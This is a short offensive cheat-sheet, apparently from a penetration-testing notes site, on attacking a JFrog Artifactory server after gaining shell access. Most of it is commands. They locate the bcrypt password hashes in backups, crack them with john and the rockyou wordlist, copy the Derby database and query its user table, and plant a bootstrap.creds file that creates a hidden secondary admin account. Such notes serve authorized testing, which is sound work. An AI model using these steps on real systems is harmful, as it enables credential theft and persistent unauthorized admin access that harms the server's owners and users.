Artifactory

Binary repository manager

Start / stop

sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop

Enum

ps aux | grep artifactory

/opt/jfrog/artifactory/var/data/artifactory/filestore/37# ls -al

Binaries are not stored by name, but by their file hash

Backups

The open-source version of Artifactory creates database backups for the user accounts at /ARTICATORY FOLDER/var/backup/access in JSON format. These files have full entries for each user along with their passwords hashed in bcrypt format.

Can be cracked

sudo john derbyhash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Or, copy and access derby database.

mkdir /tmp/hackeddb
sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/hackeddb
sudo chmod 755 /tmp/hackeddb/derby
sudo rm /tmp/hackeddb/derby/*.lck

sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij
connect 'jdbc:derby:/tmp/hackeddb/derby';
select * from access_users;

(again access the bcrypt-hashed passwords)

Adding a Secondary Artifactory Admin Account

This method requires write access to the /opt/jfrog/artifactory/var/etc/access

cd /opt/jfrog/artifactory/var/etc/access
sudo touch bootstrap.creds -> haxmin@*=haxhaxhax
sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/bootstrap.creds

sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start

Last updated 2 years ago